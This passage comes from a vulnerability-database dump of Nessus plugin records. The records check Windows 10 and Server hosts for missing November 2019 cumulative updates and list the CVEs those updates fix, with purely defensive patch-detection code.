script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4525241');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4525241])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:08", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4523205.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1397, CVE-2019-1398)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CCVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309, CVE-2019-1310)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1379, CVE-2019-1383,\n CVE-2019-1417)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1433, CVE-2019-1435, CVE-2019-1437,\n CVE-2019-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4523205.NASL", "href": "https://www.tenable.com/plugins/nessus/130901", "published": "2019-11-12T00:00:00", "title": "KB4523205: Windows 10 Version 1809 and Windows Server 2019 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130901);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2020/02/14\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-0721\",\n \"CVE-2019-1309\",\n \"CVE-2019-1310\",\n \"CVE-2019-1324\",\n \"CVE-2019-1374\",\n \"CVE-2019-1379\",\n \"CVE-2019-1380\",\n \"CVE-2019-1381\",\n \"CVE-2019-1382\",\n \"CVE-2019-1383\",\n \"CVE-2019-1384\",\n \"CVE-2019-1385\",\n \"CVE-2019-1388\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1398\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1413\",\n \"CVE-2019-1415\",\n \"CVE-2019-1416\",\n \"CVE-2019-1417\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1420\",\n \"CVE-2019-1422\",\n \"CVE-2019-1424\",\n \"CVE-2019-1426\",\n \"CVE-2019-1427\",\n \"CVE-2019-1428\",\n \"CVE-2019-1429\",\n \"CVE-2019-1433\",\n \"CVE-2019-1435\",\n \"CVE-2019-1436\",\n \"CVE-2019-1437\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1440\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4523205\");\n script_xref(name:\"MSFT\", value:\"MS19-4523205\");\n\n script_name(english:\"KB4523205: Windows 10 Version 1809 and Windows Server 2019 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4523205.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1397, CVE-2019-1398)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CCVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309, CVE-2019-1310)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1379, CVE-2019-1383,\n CVE-2019-1417)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1433, CVE-2019-1435, CVE-2019-1437,\n CVE-2019-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)\");\n # https://support.microsoft.com/en-us/help/4523205/windows-10-update-kb4523205\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fabe75f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4523205.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1406\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4523205');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4523205])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:12", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4525253\nor cumulative update 4525246. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when \n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font 